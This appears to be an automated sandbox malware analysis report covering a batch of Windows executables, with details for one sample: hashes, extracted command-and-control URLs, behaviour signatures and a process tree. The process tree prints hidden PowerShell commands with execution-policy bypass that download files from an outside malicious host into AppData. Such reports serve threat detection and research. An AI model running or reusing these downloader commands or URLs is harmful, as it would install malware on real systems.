Overview
overview
10Static
static
100811cf7c27...de.exe
windows7-x64
90811cf7c27...de.exe
windows10-2004-x64
90dd0b31f05...24.exe
windows7-x64
70dd0b31f05...24.exe
windows10-2004-x64
71ad888606f...e0.exe
windows7-x64
31ad888606f...e0.exe
windows10-2004-x64
31c77a07e45...95.exe
windows7-x64
101c77a07e45...95.exe
windows10-2004-x64
1023f1c183af...bc.exe
windows7-x64
1023f1c183af...bc.exe
windows10-2004-x64
1038e891599d...90.exe
windows7-x64
1038e891599d...90.exe
windows10-2004-x64
103a13e092e9...db.exe
windows7-x64
43a13e092e9...db.exe
windows10-2004-x64
43b9dabd99d...82.exe
windows7-x64
33b9dabd99d...82.exe
windows10-2004-x64
358fe9776f3...06.exe
windows7-x64
1058fe9776f3...06.exe
windows10-2004-x64
105ab93bd422...11.exe
windows7-x64
35ab93bd422...11.exe
windows10-2004-x64
36b06c25fc6...43.exe
windows7-x64
106b06c25fc6...43.exe
windows10-2004-x64
106cc8001c9b...07.exe
windows7-x64
16cc8001c9b...07.exe
windows10-2004-x64
173ca5dd6d4...3f.exe
windows7-x64
1073ca5dd6d4...3f.exe
windows10-2004-x64
107b931d48ea...f0.exe
windows7-x64
107b931d48ea...f0.exe
windows10-2004-x64
107d6892645b...0f.exe
windows7-x64
107d6892645b...0f.exe
windows10-2004-x64
109036aeb570...7e.exe
windows7-x64
39036aeb570...7e.exe
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-11-2024 09:49
Behavioral task
behavioral1
Sample
0811cf7c2702af79720305f03bb4945d63bd4052d4d6df4aa4cf8e6418e5d9de.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
0811cf7c2702af79720305f03bb4945d63bd4052d4d6df4aa4cf8e6418e5d9de.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
0dd0b31f05bd8036791494372275f393714ac18bae0f8d26a808387a0fcfe224.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
0dd0b31f05bd8036791494372275f393714ac18bae0f8d26a808387a0fcfe224.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
1ad888606f448d0d04c37ba11348b4c7d06f22b1cb3e8c217a21a5674bf29ce0.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
1ad888606f448d0d04c37ba11348b4c7d06f22b1cb3e8c217a21a5674bf29ce0.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
1c77a07e45b4f3e7f2b756c76df58a9d0f78785aa0f9e154074503398203c695.exe
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
1c77a07e45b4f3e7f2b756c76df58a9d0f78785aa0f9e154074503398203c695.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
23f1c183af6a0322746465beeb83e79c30ba8f497cd52d60e2ed544bb7b39ebc.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
23f1c183af6a0322746465beeb83e79c30ba8f497cd52d60e2ed544bb7b39ebc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
38e891599dad5b84356bad13b154ef7e26bb07aa651809a00369e52a54adc890.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
38e891599dad5b84356bad13b154ef7e26bb07aa651809a00369e52a54adc890.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
3a13e092e9c857702ad930dbd32ff7e4819151b0eab88be26d0229d95a74b6db.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
3a13e092e9c857702ad930dbd32ff7e4819151b0eab88be26d0229d95a74b6db.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
3b9dabd99dc58a5242616cb6d1d876bca3046119a9b150c7d7868bf02202ea82.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
3b9dabd99dc58a5242616cb6d1d876bca3046119a9b150c7d7868bf02202ea82.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
58fe9776f33628fd965d1bcc442ec8dc5bfae0c648dcaec400f6090633484806.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
58fe9776f33628fd965d1bcc442ec8dc5bfae0c648dcaec400f6090633484806.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
5ab93bd4225586706037be1870f84d4bd124b38df01f78de5648e3e0f30b8911.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
5ab93bd4225586706037be1870f84d4bd124b38df01f78de5648e3e0f30b8911.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
6b06c25fc6181adf110e8109550698897836b5c429fe9b013b2e51a3abc05343.exe
Resource
win7-20240708-en
Behavioral task
behavioral22
Sample
6b06c25fc6181adf110e8109550698897836b5c429fe9b013b2e51a3abc05343.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
6cc8001c9b61f55dc390743a9a6adfe2de01efd983f68599b288d39d3bfb7207.exe
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
6cc8001c9b61f55dc390743a9a6adfe2de01efd983f68599b288d39d3bfb7207.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
7b931d48eafa703a99ca7f104daf9a7343b6f1161d49073b86f5a4700864d3f0.exe
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
7b931d48eafa703a99ca7f104daf9a7343b6f1161d49073b86f5a4700864d3f0.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
7d6892645bc5ba581b2fff986b3e9371dd7298bab6aac890c99f80c8b1d78f0f.exe
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
7d6892645bc5ba581b2fff986b3e9371dd7298bab6aac890c99f80c8b1d78f0f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
9036aeb570b22497c0f937e7edcef624800426011f0193a2b78c7f124e3a4c7e.exe
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
9036aeb570b22497c0f937e7edcef624800426011f0193a2b78c7f124e3a4c7e.exe
Resource
win10v2004-20241007-en
General
-
Target
73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
-
Size
212KB
-
MD5
43b55685945d2cecc170b850cf622038
-
SHA1
3b301a8a8a38dddd3cfb554b264342f9948102b0
-
SHA256
73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f
-
SHA512
ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65
-
SSDEEP
3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq
Malware Config
Extracted
http://frameupds.info/rwrw66/2222z.php
Extracted
http://frameupds.info/rwrw66/1111z.php
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 4692 powershell.exe 1464 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid Process 4692 powershell.exe 4692 powershell.exe 1464 powershell.exe 1464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.execmd.exedescription pid Process procid_target PID 3816 wrote to memory of 4280 3816 73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe 87 PID 3816 wrote to memory of 4280 3816 73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe 87 PID 4280 wrote to memory of 1056 4280 cmd.exe 89 PID 4280 wrote to memory of 1056 4280 cmd.exe 89 PID 4280 wrote to memory of 4692 4280 cmd.exe 92 PID 4280 wrote to memory of 4692 4280 cmd.exe 92 PID 4280 wrote to memory of 1464 4280 cmd.exe 93 PID 4280 wrote to memory of 1464 4280 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\PING.EXEping localhost -n 63⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD54267fc1e87ee23aeb8b9a7d0497091c5
SHA159ddae7dc44b8317ff933ad113493eb1644c52c0
SHA256ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d
SHA5121d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5KB
MD503868028bcd5c24c468e2c66571fb850
SHA1c1dbed55b06bcc1b6a6211f7f8de592d92beb911
SHA256c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313
SHA512d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999